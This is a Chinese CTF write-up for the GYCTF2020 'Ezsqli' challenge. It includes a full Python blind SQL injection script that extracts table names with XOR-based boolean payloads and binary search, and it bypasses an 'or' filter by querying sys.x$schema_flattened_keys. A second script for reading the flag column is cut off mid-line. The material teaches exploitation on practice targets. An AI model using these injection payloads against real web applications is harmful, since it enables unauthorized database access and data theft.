[GYCTF2020]Ezsqli
先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。
import requests
import time
url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/"
flag = ""
payload = "1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})^1"
for i in range(1,100):
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2
while (min_value < max_value):
py = payload.format(i,mid)
data = {
"id": py}
r = requests.post(url=url,data=data)
if "Nu1L" in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if (chr(mid) == " "):
break
flag += chr(mid)
print(flag)
time.sleep(0.5)
爆出来表名是f1ag_1s_h3r3_hhhhh,但是information.schema被过滤以后我们没法像之前一样继续爆列名。但我们知道了表名所以可以用ascii位偏移比较字符串来获取表的内容。(select 1,"{}")
是因为flag在f1ag_1s_h3r3_hhhhh的第二列,可以从(select 1,1)
,(select 1,1,1)
试出来。
同样加入sleep避免请求太快出错。
import requests
import time
url = 'http://67e56c51-dad1-4cd9-b205-91d106ccf701.node4.buuoj.cn:81/'
def add(flag):
res = ''
res += flag
return res
flag = ''
for i in range(1,